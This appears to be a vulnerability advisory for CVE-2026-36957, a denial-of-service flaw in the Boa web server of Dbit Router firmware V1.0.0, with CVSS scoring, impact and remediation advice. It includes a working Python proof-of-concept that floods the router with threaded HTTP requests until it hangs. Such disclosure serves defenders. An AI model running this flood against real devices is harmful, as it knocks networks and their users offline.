## https://sploitus.com/exploit?id=D3844EF0-691D-5A32-8788-F4D28228E9EA
# CVE-2026-36957: Denial of Service via HTTP Flood on Boa Web Server
**CVE ID:** CVE-2026-36957
**Date:** 2026-04-29
**Discoverer:** Kirubel Solomne
**Vendor:** Shenzhen Dibit Network Equipment Co., Ltd.
**Product:** Dbit Router
**Firmware Version:** V1.0.0
**CWE:** CWE-400 - Uncontrolled Resource Consumption
---
## Description
The Dbit Router firmware V1.0.0 is vulnerable to Denial of Service via the Boa web server URI handler. By sending a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities.
---
## CVSS Score
**CVSS v3.1 Score: 7.5 (High)**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | None |
| Integrity Impact | None |
| Availability Impact | High |
---
## Proof of Concept
```python
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
```
**Expected Behavior:** Server should limit connections and remain stable.
**Actual Behavior:** Router web interface becomes unresponsive; requires manual reboot.
---
## Impact
- Complete loss of web management interface
- Disruption of all routing capabilities
- Requires manual reboot to restore service
- Network downtime for all connected devices
---
## Remediation
- Implement connection rate limiting on the Boa web server
- Add watchdog timer to recover from deadlock states
- Limit maximum concurrent connections per IP
---
## Disclosure Timeline
| Date | Event |
|---|---|
| 2026-04-29 | Vulnerability discovered |
| 2026-04-29 | Reported to MITRE |
| 2026-04-29 | CVE-2026-36957 assigned |
| 2026-04-29 | Public disclosure |
---
## References
- [MITRE CVE-2026-36957](https://vulners.com/cve/CVE-2026-36957)
- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)
- [Vendor Website](http://dbit.com)